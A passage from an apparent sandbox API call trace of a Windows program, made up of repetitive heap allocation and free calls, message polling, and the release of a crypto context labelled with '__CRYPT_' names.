(HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0267.527] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0267.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0267.527] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0267.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0267.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0267.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0267.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0267.527] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0267.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0267.527] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0267.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0267.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.528] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0267.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0267.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0267.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0267.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0267.528] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0267.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0267.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14d28 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0267.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0267.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0267.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0267.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0267.530] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0267.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0267.530] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0267.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0267.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0267.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0267.530] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0267.531] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0267.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51880 [0267.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0267.531] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0267.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0267.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0267.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0267.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0267.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0267.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0267.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515f8 [0267.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0267.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0267.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0267.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0267.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0267.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0267.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0267.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0267.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0267.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0267.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0267.532] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0267.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.532] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0267.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0267.532] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0267.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0267.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0267.533] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0267.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0267.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0267.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0267.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0267.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0267.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0267.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0267.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0267.533] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0267.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.533] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51880 [0267.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0267.534] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0267.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0267.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0267.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0267.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0267.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0267.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0267.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0267.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0267.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0267.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0267.538] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0267.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0267.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.538] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0267.538] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0267.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69c08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0267.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0267.539] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0267.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0267.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0267.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0267.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0267.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0267.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0267.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0267.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0267.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0267.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0267.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0267.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0267.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0267.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0267.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0267.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0267.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 